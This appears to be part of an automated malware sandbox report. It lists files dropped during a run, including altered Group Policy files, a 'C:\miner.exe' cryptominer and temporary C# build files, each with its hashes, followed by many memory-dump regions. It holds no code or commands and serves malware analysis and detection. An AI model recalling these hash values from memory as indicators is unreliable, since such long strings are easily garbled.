12331485f4b95f86f8d95f05ab767f37af156e5cd40caab6e37b81a47225bf24

SHA512
212e9fe10f5e2becfd29005a4aa5fd86f23b4491f7cf31d564ec7d247ba567eaf7bd90e756aff911c72df026d85a3e37a8e9335a3b81247722c2e20b794a267e

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
d2040cd48bc674c9cd7257453da9e18f

SHA1
b8bb9b55560667ac7578c34c1a4dad1f641076ec

SHA256
fdd69ac3c586830a7725ac023cfa80888b9bf692cabf545104e322f4bc0a4ae7

SHA512
eab87358eeffab3a858c35f935b0b0019fe9c04fb2a57c805e7a9d67d1b6a18ba69ca6357be53dba1c83be8a952f092e8cce602d1e08e51e2c30cf089938979d

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
54784465609d5525bca207b3944147aa

SHA1
2218c0745866141a7c820a71ca342779f7e77162

SHA256
cded0ecd37bbdbc0ecfd9501f87e9875e9cea87dfa8568c7a973bd500f4a478c

SHA512
9affd32ef9f35a5006d9638ec0c221d8c356620702c266aea08118c3e792a121a0443fc3a48fa583f53b63a65f177536d17918a0415964e26010a1f87a07ef3c

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
76436041ffe9b894ddd0d5fb8ddf4545

SHA1
0a4630694ff480019d7c89c5b046c3bdf3268cf4

SHA256
4d340c9603df45b9003ca6d27528058360581e47e425af4deb6fb16dd3123b49

SHA512
79ba3ee4263d1c0b285c2be1168eea20380ebaa20cb9c1d0c72a2a4b52ec8f4ad02211a95780bb2825d6671d94abbdc92cc5884a2f70157e699e4f9435e5cd99

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
84f091da78bc7e9c9e079194041544f4

SHA1
bf523ca34ffd47cdf2ca81f345c0331f858c2f4d

SHA256
3db71330793a091c672509d449bf5edad9594a33b76d1a547f4bdfcc18f5120b

SHA512
ace247769865bd51040af0fcbbaac6127ec55d03c3e306bda180cc7486c4290d7943d58e720cb9bcea261718bda3cca5db738ce0affd7aee2324d54dc9b4a89b

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
aaccf25a57c4abdcd93039f292d3ec28

SHA1
449b23a7c1b95d79ff96f153c5178a274ebf2978

SHA256
7a2eb686541c33c0c89e8ac70333f5cbbf3060f8c2aa03bea1bfa726e9e13ab7

SHA512
ee6c3cf82f772c776c591d458b606fedea511b079d317c603aaff50b05b529f730bbd6481d486224b1609218d0fabec5df6f9b9dcd32268b496d7357894e42c7

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
fb463220a8e91530f2f3d728d9e54322

SHA1
479cd1900c29f3e027c362aac43af3ce35346692

SHA256
9293758c7e580b46cd8de16187ec5d74841cd0466d43bed86a6f9ca43164aa5b

SHA512
9d1ecc603bb4cec2d9ef556ff69804bbfd69f1b0846e61d477093f13769d1a1fa5e2858f584b79b771984b872b4a4cceab28a47a2eb64860d978db82b2e6b60b

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
9c5f132f318e0cae66b7d1619782e16b

SHA1
679b3287fa1c59aa61ef7e3e99531260be1c82ee

SHA256
c62492c7e743c5a3dc93501e5ee8cab9a437495e4e6fc3dbaca1d82b0b8f636c

SHA512
ab740246c3f3062221a7412da0d7f199ddc125fe5c1a4d82266c853150363cc2423f6190b9d1c91fc553bb59628659a5b1097d3a5804e237de954e3ddd9a3271

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
66d8f2ec4e6143e69d0e5aae4e38afea

SHA1
7637b97ed8960c52ddf648b88ee2db5dedc41490

SHA256
a1ddb65c324a98efa8453791ec605ee7fae3e8f2b20863a8fe47c928d8a00aa5

SHA512
3ad39945f77e38a2250f58c205bb84fcc2d6f43410e4e193aa8b6eec37bd84e056b554b610134c905ae380bd920281d277342550ee54d089e8f80e410a5b4a15

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
4c4a74a0b15b507b1b13f16d760df62f

SHA1
6d945ed71770e9b081b206971bc385f0adf2e76e

SHA256
2a0162ea81e186f6b0d20cd4ac11552c2e2bfb7b66cef4b32c97b921cd38a015

SHA512
dbef90df4d5760deebe755b32fc9fff925018b3e1762c4323ead8b93fb207931153ab0e2ba826fcdbaef9a7b469f8492fa06d01ea10646c993f4f67711f01b1a

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
0bfba963a38d6dd2251819e2f0646194

SHA1
25912d194c3a77a57f9309c2d3033cb1741b09eb

SHA256
08e5437b0dccb96ab407151080b02fadd66862767c0d32cf100cc57f5e9d6f4f

SHA512
bc0ed84b0859d041071cb727415d893ba72a58b2a76df082a5d62f203b4d54f05df26cfaa31c2c9072c56a435d36ecaf94a10234ffc7effb528c2998ed9cb381

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
86503d7b734d53f65e79b0e0c64b4e00

SHA1
3f2f7906d58817689e1f1335299961603164803d

SHA256
c5bc486f813644c4d66d735f76611a007470ba544b85159f8a8ad750cdb1887e

SHA512
f8d1496b75b3d044cd1d2c872d2ebb0540f42f58c36f8601a6ff1f67459a1b47e007dd39f3cf913252f4fe31f0bf279a19ef16a14f7202e9aaf63c5dc10fd2dc

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
fb3c6da881df4a8392214ea24087f4fe

SHA1
d2db4864b54b2d6f61769dc7c02ee9d106e3debc

SHA256
01890ae6948c519adb824400ab7d2543b95dcfe07a692009679715fe21886801

SHA512
da4ce081990f27f98fd5b24b41f3f0a845865e951e5418a903469d440fc3c08975550a353d854e592120a4152e6e019444447abf053776aa09eac53fb0439c66

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
2aea74f82616a457e939adaf098ea9f6

SHA1
4074b53e7838b0806f2babc782254d7b9f52a54c

SHA256
4a1a2feb59298a33e289679fd100c6f90a9179e0319ca7acc3e89bb17f098e70

SHA512
a7a30c48f2aa0e3f6a22d2347c28cc11a6519b30f1c39e1f7e688bb3a76176f79e73e1ed70999d39623885911f4e1d9f677b6c324a4c086722e38a010e972bc0

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
2dc8ba309e0eed72c6fe3d46e6da6765

SHA1
9a99308d361c052ac02e8b4550b315a8b1538127

SHA256
be6a7e2d0d2bf714dc5facc9f8eb12e0a8f1708946fdda3063f175f31361814f

SHA512
06e80c129e0723a8a6e9ef1db77b2213f110657d85c0fa34c8c0b777d8d3668544f6fd4440f55d6b019f2c584d30f65199f9c9bd2040c86a1da82874d3c2c674

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
e6c664e01c9b3b582e047394d9c2b9fd

SHA1
25be2d704c75beff1d6b03123a5820910ccfab2d

SHA256
8c753c106ab6f0f2ef311d59870eafd81230a8ef5ffdcf6d50062eca7af4bb30

SHA512
b73543431c64bd4aaee731184e44efcb1259a438fed90de5337b0a15b90801ca3a62d515768c189f8f0246c82cbb8d6ec13a804bfe7139885e5fa799405aba4f

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
a91cc2cad3252b9b00301358f737f831

SHA1
07f66c46fa75f23f76cb688488373b1e98350390

SHA256
76be4d9d8f2c7c9cc72c8834cdf259ed4fd23401332be0ccd8141f5d4ef937f4

SHA512
4d2034db69d482612529c227c817732ee42609a0d3a97dc9cef67e3c57bf40f88e334f18bd85259cb75ac344698181852d5c4302d7a739ab8a83f1de505af68d

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
a908723be920a1bead02a4b611b5426b

SHA1
11f5a365f7bc42990d80fad47931c36ac0b8312c

SHA256
7299963b6f03eb0fbb7c0effc94f07b23fea1799a277353f73ae8dd924022630

SHA512
d64cc5fa2c5ca729b1c3264819fc4a7ea422e4e99082d82c0d77944d4246e9efc70722bdfe193c927cf60e9b1c8ec6740c929289c1646028b660ae9008a90f36

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
c4be41f15fcfe4c3901d48a3ca552046

SHA1
9e0d73970f9969901361deb983c8cf6d96c44ccb

SHA256
7d0a09735915c86a55ea14d84c7df5d7cae7b82b2e8392f6498c8945797a1adb

SHA512
8b35e55797938a93ab8df09048051e2df0863e95aad9172777d791d118466349cd3551952cde866ddbbd44114779094da48f7275ef7fec6d9ecf77957aadde8e

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
3733d38e2db2cac25e64563b735bd272

SHA1
794f011ccf2fadb1594546c6ea9a43146d1609dd

SHA256
f60f613dc38f96491b2941a93671fc74561b0c4cf0aabf56d72e27aaa06edb10

SHA512
21d36243b4dc93dec30c1f96c1606f8cffed842c4106268156328bd76247befd2406d374b9b043d951b8761fb3448858e658c72a02c68c2a8585cf675eed72e3

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
a0521abde12606299d805a87a74602d8

SHA1
e8a1b1b6a3674e2a81be08e747e6ccc7584c1b25

SHA256
413c6e9c45b1ceaee737d7cfefee93083f44554d95f3c9cdcae890cfffe8cf8d

SHA512
89b628af7a353b791a68710b3357eb815042ee382448fadd71223cb3cf912abb34a09410ff02ef461455960d2f04a780603865618dd059b6f90c0c08c03d9d24

Download Submit
C:\Windows\System32\GroupPolicy\GPT.INI
Filesize
235B

MD5
c0fe39c0acbef93c690f3beba1047319

SHA1
cb1817e1af058ccf403b8d0594a2e4cb48194a8b

SHA256
19870f975f0b4c6d9384e8632d92baad3e1d7bf4fdc0fa61d161545c173d5ba8

SHA512
fc101ad456f0367d4d4ea2fca920a17ae0e2d95c608e8f077f80f6daf9116151e9341675dc56f09734736119948df28efb6f56e85e8a9cb6d53391a45d92ac2e

Download Submit
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
Filesize
2KB

MD5
0189411f7cbd660944d10f5c85addf19

SHA1
809f9a0b1d793bdecb0e89ed5031195a88e97681

SHA256
acb15f14fe7547ad5b5765f0c945af1753d903bba3690b764193f41c3a7f394a

SHA512
7db2012ba1ac3968ee34548a7b7b74d0ae364c78df0a529f7224b2d8883f7a11343ae687b2786ef83ee40912881558c47073566fbd26972241b2786c7a612f3a

Download Submit
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
Filesize
3KB

MD5
ca371b43e4ff6dc472a8037c2a5bc69f

SHA1
5a0ff91820baa64c0dd3aea5bb99d1523973ecec

SHA256
7c3fad50fa7fecfab30d70d50df17a90a5e6b887bae5edc482659daef30efb02

SHA512
874257d1fce9260b8400f15b38c073e37ce3594fe502573a42e2e236ce8a57d5a9b52e35108ee324c28a734e5b57737cf13272e1e09126b540ad1c89eadf88ec

Download Submit
C:\Windows\System32\GroupPolicy\User\Registry.pol
Filesize
174B

MD5
910f503f6c841ad68c8f52c91239b0a6

SHA1
358ede0cc355c08ba5c0d23519bdb09369d7020e

SHA256
65e70de7b331bb36ce4fdb20c8bce932f055481be17f7b72b38f94a415e376f2

SHA512
25d4eb0a162136a3744f70a2fb88ec198418750fe9ba181662f01ccee82d26498d0330de4eb0dee3b9a0571c598806fbc5495c9961580bf75e6808d3d86225da

Download Submit
C:\Windows\System32\GroupPolicy\User\Registry.pol
Filesize
520B

MD5
0e7c336637fa0448940665f0aa026c96

SHA1
bfc72d8957667c7ebc1535848d2a9c0240d98af9

SHA256
aace755c854c2d470bcffc53139930eaaf68d2add28bc4b48befa981d2d74ed1

SHA512
9884b4b8b54e2b2bb829ee44b88367425a444c6d48d6e12ee22cc888c9fdbff41f92107e8429ade0a257a290609453ff9bd636922a559b9f37c377d438fd7b45

Download Submit
C:\miner.exe
Filesize
20.1MB

MD5
d5b255fa10cdbec7cfb0e48b86bf55ab

SHA1
60ab9c9406304682c06bee5e17c33b935935a84f

SHA256
d5b8d6a84c2288314e75c020a9d1006a1e730b7d986033c90c9c3deb0e24b5c3

SHA512
5d988c6a6c1913f7c1a1f4f73959f5c2470fae356009575997a2923fba4be62eced3396eef77611549ba57b274824d37234c5327fafaf7ad1a515802fbfdfe2f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\k4vekonb\CSC77162FF4B59A478E91A85F309E389769.TMP
Filesize
652B

MD5
1f5e6f4ba2455b0c8f70d631f646d720

SHA1
ae30082b348c5678e0e9806d9e855b30fc4752c0

SHA256
51b566258dcb9124104ee8537a9f70794d6c17f425b7c0f253327a7a5ac1ce70

SHA512
c9e2371d9b45b5fbe084ef7f517b017a63fccfd90fe8ce7a015b73808be589b2ad4c840fb1c6a11ebf045fe9e7f78f0fbe9a11a414c2136bdfd8864e3d9b2cd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\k4vekonb\k4vekonb.0.cs
Filesize
1KB

MD5
711a6dbcd4c58779c4d02654595bd96f

SHA1
ffee48556a9837e2da89ae4909181e78852019d2

SHA256
9255d1c8a353e3bdef3afa42c45754ef3a8251258b45b66a41162cb96611c8cb

SHA512
b5e3d7ee587559ca7b1f1c82412bb979ef47534fbf5f10dd77f080037c978452a3235bb0e676169fd4f1e6fab98149932da0d25e503fad5ced25328f259ebce7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\k4vekonb\k4vekonb.cmdline
Filesize
369B

MD5
0bfdfaba84c99a994e50457efdc99215

SHA1
dd593b976ecca5abeb5e82705a431f6fab0c71c3

SHA256
773a1341dfa91de2b06b582e2507bf8766809e1b11aa3ced9d59fbc6087d397d

SHA512
1177910304558f70dd27c0a2da46048aeaf74f06e428e2ff2ae1fa714f8016258a619ee8c7221ec926a1f389f824e41e9af694120a77f29dfef52576bc15d4c7

Download Submit
memory/64-1114-0x00000000008B0000-0x00000000008BA000-memory.dmp

Filesize
40KB

Download
memory/3124-1724-0x0000000061CC0000-0x0000000061D69000-memory.dmp

Filesize
676KB

Download
memory/3124-1032-0x0000000061CC0000-0x0000000061D69000-memory.dmp

Filesize
676KB

Download
memory/6376-2724-0x0000000003270000-0x00000000032A1000-memory.dmp

Filesize
196KB

Download
memory/6496-2730-0x0000000003300000-0x0000000003331000-memory.dmp

Filesize
196KB

Download
memory/6544-2743-0x0000016659150000-0x0000016659172000-memory.dmp

Filesize
136KB

Download
memory/6544-2757-0x0000016659180000-0x0000016659188000-memory.dmp

Filesize
32KB

Download
memory/6832-2780-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2787-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2811-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2810-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2768-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2769-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2770-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2771-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2772-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2773-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2774-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2775-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2776-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2777-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2778-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2779-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2761-0x000002AA570B0000-0x000002AA570D0000-memory.dmp

Filesize
128KB

Download
memory/6832-2781-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2782-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2783-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2784-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2785-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2786-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2809-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2788-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2789-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2790-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2791-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2792-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2793-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2794-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2795-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2796-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2797-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2798-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2799-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2800-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2801-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2802-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2803-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2804-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2805-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2806-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2807-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6832-2808-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp

Filesize
11.0MB

Download
memory/6864-2763-0x00007FFE303A0000-0x00007FFE303A2000-memory.dmp

Filesize
8KB

Download
memory/6864-2764-0x0000000140000000-0x0000000141B39000-memory.dmp

Filesize
27.2MB

Download
memory/6864-2762-0x00007FFE30390000-0x00007FFE30392000-memory.dmp

Filesize
8KB

Download